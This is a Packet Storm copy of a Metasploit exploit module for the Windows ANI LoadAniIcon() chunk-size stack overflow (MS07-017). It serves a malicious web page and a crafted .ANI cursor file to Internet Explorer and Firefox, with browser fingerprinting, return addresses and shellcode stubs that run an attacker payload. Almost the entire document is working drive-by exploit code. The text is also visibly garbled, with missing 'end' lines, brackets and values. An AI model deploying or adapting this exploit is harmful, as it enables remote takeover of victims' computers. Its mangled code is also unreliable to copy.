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packetstormH D MoorePACKETSTORM:88402
HistoryApr 15, 2010 - 12:00 a.m.

Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP)

H D Moore

0.15 Low




# $Id: ms07_017_ani_loadimage_chunksize.rb 9085 2010-04-15 16:08:27Z jduck $  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
require 'msf/core'  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GreatRanking  
# This module acts as a HTTP server  
include Msf::Exploit::Remote::HttpServer::HTML  
def initialize(info = {})  
'Name' => 'Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP)',  
'Description' => %q{  
This module exploits a buffer overflow vulnerability in the  
LoadAniIcon() function in USER32.dll. The flaw can be triggered through  
Internet Explorer 6 and 7 by using the CURSOR style sheet directive  
to load a malicious .ANI file. The module can also exploit Mozilla  
Firefox by using a UNC path in a moz-icon URL and serving the .ANI file  
over WebDAV. The vulnerable code in USER32.dll will catch any  
exceptions that occur while the invalid cursor is loaded, causing the  
exploit to silently fail when the wrong target has been chosen.  
This vulnerability was discovered by Alexander Sotirov of Determina  
and was rediscovered, in the wild, by McAfee.  
'Author' =>  
'hdm', # First version  
'skape', # Vista support  
# Firefox support, OS language independence, improved reliability  
'Solar Eclipse <[email protected]>'  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 9085 $',  
'References' =>  
['CVE', '2007-0038'],  
['OSVDB', '33629'],  
['BID', '23194'],  
['MSB', 'MS07-017'],  
['URL', ''],  
['URL', ''],  
'DefaultOptions' =>  
'EXITFUNC' => 'process',  
'Payload' =>  
'Space' => 1024 + (rand(1000)),  
'Compat' =>  
'ConnectionType' => '-find',  
'Platform' => 'win',  
# Automatic target tested on:  
# Windows NT SP6 + IE6 SP1  
# Windows 2000 SP4 + IE6 SP1  
# Windows 2000 SP4 UR1 + IE6 SP1  
# Windows XP SP0  
# Windows XP SP1  
# Windows XP SP2  
# Windows XP SP2 + IE7  
# Windows 2003 SP0  
# Windows 2003 SP1  
# Windows 2003 SP1 + IE7  
# Windows Vista  
# Windows XP SP0 + Firebird 0.7  
# Windows XP SP0 + Firefox 1.0  
# Windows XP SP0 + Firefox 1.5  
# Windows XP SP2 + Firefox 2.0  
# Windows 2003 SP1 + Firefox 2.0  
# Windows Vista + Firefox 2.0  
'Targets' =>  
[ '(Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista',  
'Method' => 'automatic'  
[ 'IE6 on Windows NT, 2000, XP, 2003 (all languages)',  
'Method' => 'jmpesp',  
'Ret1' => 0x0040afff, # jmp esp on NT, 2000, XP, 2003 SP0 (iexplore.exe)  
'Ret2' => 0x004090df # jmp esp on 2003 SP1, SP2 (iexplore.exe)  
[ 'IE7 on Windows XP SP2, 2003 SP1, SP2 (all languages)',  
'Method' => 'jmpesp',  
'Ret1' => 0x00420B45, # jmp esp on XP SP2 (iexplore.exe)  
'Ret2' => 0x00420B45 # jmp esp on 2003 SP1, SP2 (iexplore.exe)  
[ 'IE7 and Firefox on Windows Vista (all languages)',  
'Method' => 'partial',  
'Ret' => 0x700B # we change user32.dll+5879 to user32.dll+700B (jmp [ebx] in user32.dll)  
[ 'Firefox on Windows XP (English)',  
'Method' => 'jmpesp',  
'Ret1' => 0x77059E48, # jmp esp on XP (comres.dll)  
'Ret2' => 0x77019668 # jmp esp on 2003 SP1, SP2 (comres.dll)  
[ 'Firefox on Windows 2003 (English)',  
'Method' => 'jmpesp',  
'Ret1' => 0x77019668, # jmp esp on 2003 SP0 (comres.dll)  
'Ret2' => 0x77019668 # jmp esp on 2003 SP1, SP2 (comres.dll)  
'DisclosureDate' => 'Mar 28 2007',  
'DefaultTarget' => 0))  
['SRVPORT', [ true, "The daemon port to listen on", 80 ]),'URIPATH', [ true, "The URI to use.", "/" ])  
], self.class)  
# Handle HTTP requests  
def on_request_uri(cli, request)  
# Automatic browser and OS detection  
print_status("Attempting to exploit ani_loadimage_chunksize")  
browser = ''  
if target['Method'] == 'automatic'  
agent = request.headers['User-Agent']  
# Check for Firefox requests  
if agent =~ /(Gecko|Microsoft-WebDAV-MiniRedir)/  
browser = 'Mozilla'  
# WebDAV requires that we use port 80 and the URIPATH is '/'  
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'  
print_status("Mozilla request received from #{cli.peerhost}. To exploit Mozilla browsers, SRVPORT must be set to 80 and URIPATH must be '/'")  
cli.send_response(create_response(404, "File not found"))  
if agent =~ /(Windows NT 6\.0|MiniRedir\/6\.0)/  
target = targets[3] # Firefox on Vista  
elsif agent =~ /(Windows NT 5\.1|MiniRedir\/5\.1)/  
target = targets[4] # Firefox on XP  
elsif agent =~ /(Windows NT 5\.2|MiniRedir\/5\.2)/  
target = targets[5] # Firefox on 2003  
print_status("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")  
# Check for MSIE requests  
elsif agent =~ /MSIE/  
browser = 'IE'  
if agent =~ /Windows NT 6\.0/  
target = targets[3] # IE7 on Vista  
elsif agent =~ /MSIE 7\.0/  
target = targets[2] # IE7 on XP and 2003  
elsif agent =~ /MSIE 6\.0/  
target = targets[1] # IE6 on NT, 2000, XP and 2003  
print_status("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")  
# Unknown user agent  
print_status("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")  
# Find out if this is a request for an ANI file  
# Mozilla always uses a .ani extension, but IE randomly picks one of the  
# other extensions for the ANI request  
exts = ['bmp', 'wav', 'png', 'zip', 'tar', 'ani']  
ani_request = false  
match = /\.(...)$/.match(request.uri)  
if match and exts.include?(match[1])  
ani_request = true  
# OPTIONS and PROPFIND requests sent by the WebDav Mini-Redirector  
if request.method == 'OPTIONS'  
print_status("Received WebDAV OPTIONS request from #{cli.peerhost}:#{cli.peerport}")  
headers = {  
'DASL' => '<DAV:sql>',  
'DAV' => '1, 2',  
'Public' => 'OPTIONS, GET, PROPFIND',  
send_response(cli, '', headers)  
if request.method == 'PROPFIND'  
print_status("Received WebDAV PROPFIND request from #{cli.peerhost}:#{cli.peerport}")  
body = ''  
if (not ani_request)  
# Response for directories  
body = '<?xml version="1.0"?><a:multistatus xmlns:a="DAV:"><a:response><a:propstat><a:prop><a:resourcetype><a:collection/></a:resourcetype></a:prop></a:propstat></a:response></a:multistatus>'  
# Response for files  
body = '<?xml version="1.0"?><a:multistatus xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/" xmlns:c="xml:" xmlns:a="DAV:"><a:response></a:response></a:multistatus>'  
send_response(cli, body, {'Content-Type' => 'text/xml'})  
# HTML requests sent by IE and Firefox  
if (not ani_request)  
# Pick a random extension to use when we generate HTML. The moz-icon URL  
# must have a .ani extension, but we can use a random one for IE  
ext = exts[rand(exts.length)]  
# Generate the HTML  
html =  
"<html>" +  
"<head><title>" + random_padding + "</title></head>" +  
"<body>" +  
random_padding +  
(browser == 'IE' ? generate_ie_html(ext) : generate_mozilla_html) +  
random_padding +  
"</body>" +  
print_status("Sending HTML page to #{cli.peerhost}:#{cli.peerport}...")  
send_response(cli, html)  
# ANI requests sent by IE and the WebDav Mini-Redirector  
# Re-generate the payload  
return if ((p = regenerate_payload(cli)) == nil)  
print_status("Sending #{} to #{cli.peerhost}:#{cli.peerport}...")  
# Transmit the compressed response to the client  
send_response(cli, generate_ani(p, target), { 'Content-Type' => 'application/octet-stream' })  
# Generate a <div> element with a style attribute referencing the ANI file  
def generate_ie_html(ext)  
path = get_resource.sub(/\/$/, '')  
"<div style='" +  
random_css_padding +  
Rex::Text.to_rand_case("cursor") +  
random_css_padding +  
":" +  
random_css_padding +  
Rex::Text.to_rand_case("url(") +  
random_css_padding +  
'"' +  
path + '/' + rand_text_alphanumeric(rand(80)+16) + '.' + ext +  
'"' +  
random_css_padding +  
");" +  
random_css_padding +  
"'>" +  
random_padding +  
# Generate a img tag with a moz-icon URL referencing the ANI file  
def generate_mozilla_html  
path = get_resource.gsub(/\/$/, '')  
# The UNC path of the ANI file must have at least one directory level,  
# otherwise the WebDAV redirector will not work  
if path == ''  
path = '/' + rand_text_alphanumeric(rand(80)+16)  
return '<img src="moz-icon:file://///' +  
datastore['SRVHOST'] +  
path + '/' + rand_text_alphanumeric(rand(80)+16) + '.ani">'  
# Generate CSS padding  
def random_css_padding  
buf =  
random_whitespace +  
"/*" +  
random_whitespace +  
random_padding +  
random_whitespace +  
"*/" +  
# Generate random whitespace  
def random_whitespace  
len = rand(100)+2  
set = "\x09\x20\x0d\x0a"  
buf = ''  
while (buf.length < len)  
buf << set[rand(set.length)].chr  
# Generate random padding  
def random_padding  
# Generate an ANI file that will trigger the vulnerability  
def generate_ani(payload, target)  
# Valid ANI header  
header = [  
36, # cbSizeOf (must be 36)  
rand(128)+16, # cFrames (must be > 1 and < 0x10000)  
rand(1024)+1, # cSteps (must be < 0x10000)  
0, 0, # cx, cy  
0, # cBitCount  
0, # cPlanes  
0, # JifRate  
1 # Flags (must have the LSB bit set)  
overflow = ''  
if target['Method'] == 'jmpesp'  
# ANI header that triggers the overflow:  
overflow =  
# 36 bytes of fake header  
# When we get control, the ebx and esi registers have the following values:  
# 2000, XP, 2003 before MS05-002  
# ebx = 0, esi = pointer to MappedFile struct  
# NT before MS05-002  
# ebx = pointer to dword 1, esi = pointer to MappedFile struct  
# all versions after MS05-002, including XP SP2 and 2003 SP1  
# ebx = pointer to MappedFile struct  
# The first field in MappedFile is a pointer to the ANI file  
"\x85\xDB" + # test ebx,ebx  
"\x74\x0A" + # jz jmp_esi 2000, XP, 2003 before MS05-002  
"\x81\x3B\x01\x00\x00\x00" + # cmp dword [ebx], 0x1  
"\x74\x02" + # jz jmp_esi NT before MS05-002  
"\x89\xDE" + # mov esi, ebx all versions after MS05-002  
# jmp_esi:  
"\x8B\x36" + # mov esi,[esi] pointer to ANI file  
"\x81\x3E\x52\x49\x46\x46" + # cmp [esi], 'RIFF'  
"\x75\x02" + # jnz failed  
"\xFF\xE6" + # jmp esi  
# failed:  
"\x31\xc0" + # xor eax, eax  
"\x8b\x00" + # mov eax, [0] exit via SEH  
rand_text(2) +  
"\x00\x00\x00\x00" + # header flags (LSB bit must be set to 0)  
# end of header  
rand_text(4*6) + # local variables  
# The following local variables must be NULL to avoid calls to  
# HeapFree and NtUserDestroyCursor  
# 2000, XP, 2003 SP0 2003 SP1  
"\x00\x00\x00\x00" + # var_10  
"\x00\x00\x00\x00" + # var_C  
"\x00\x00\x00\x00" + # var_C  
"\x00\x00\x00\x00" + # var_8  
"\x00\x00\x00\x00" + # var_4  
target['Ret1'], # return address for NT, 2000, XP and 2003 SP0  
target['Ret2'] # return address for 2003 SP1  
].pack('VV') +  
rand_text(4*4) + # function arguments  
"\x90\x90\x90\x90" + # jmp esp on NT, 2000, XP and 2003 SP0 lands  
# here, 2003 SP1 lands on the next dword  
"\xeb\x92" # jump back to the shellcode in the ANI header  
elsif target['Method'] == 'partial'  
# ANI header that triggers the overflow:  
overflow =  
# 36 bytes of fake header  
rand_text(32) +  
"\x00\x00\x00\x00" + # header flags (LSB bit must be set to 0)  
# end of header  
rand_text(4*8) + # local variables  
# The following local variables must be NULL to avoid calls to  
# HeapFree and NtUserDestroyCursor on Vista  
"\x00\x00\x00\x00" + # var_C  
"\x00\x00\x00\x00" + # var_8  
"\x00\x00\x00\x00" + # var_4  
rand_text(4) + # saved ebp  
target['Ret'], # 2 byte partial overwrite of the return address  
raise "Unknown target #{targetr['Method']}"  
# Build the ANI file  
# The shellcode execution begins at the RIFF signature:  
# 'R' 52 push edx  
# 'I' 49 dec ecx  
# 'F' 46 inc esi  
# 'F' 46 inc esi  
# eb 3a jmp +3a # jmp to the code in the payload chunk  
ani =  
"RIFF" + "\xeb\x3a\x00\x00" +  
"ACON" +  
riff_chunk("anih", header) +  
# payload chunk  
Rex::Arch::X86.copy_to_stack(payload.encoded.length) +  
payload.encoded) +  
random_riff_chunks +  
# the second anih chunk trigger the overflow  
riff_chunk("anih", overflow) +  
return ani  
# Builds a RIFF chunk with a specified tag and data  
def riff_chunk(tag, data)  
len = data.length  
padding = len % 2 # RIFF chunks must be 2 byte aligned  
return tag + [len].pack('V') + data + ("\x00" * padding)  
# Generates a random number of random RIFF chunks, up to 4352 bytes  
def random_riff_chunks(count = rand(16) + 17)  
chunks = ''  
0.upto(count) do  
chunks << random_riff_chunk()  
return chunks  
# Generates a random RIFF chunk, up to 136 bytes  
def random_riff_chunk(len = rand(128) + 1)  
riff_chunk(random_riff_tag, rand_text(len))  
# Generates a random RIFF tag, making sure that it's not one of the  
# tags processed by LoadAniIcon or LoadCursorIconFromFileMap  
def random_riff_tag  
valid = ['RIFF', 'ACON', 'anih', 'LIST', 'fram', 'icon', 'rate']  
tag = nil  
tag = rand_text_alpha(4)  
end while valid.include? tag  
return tag  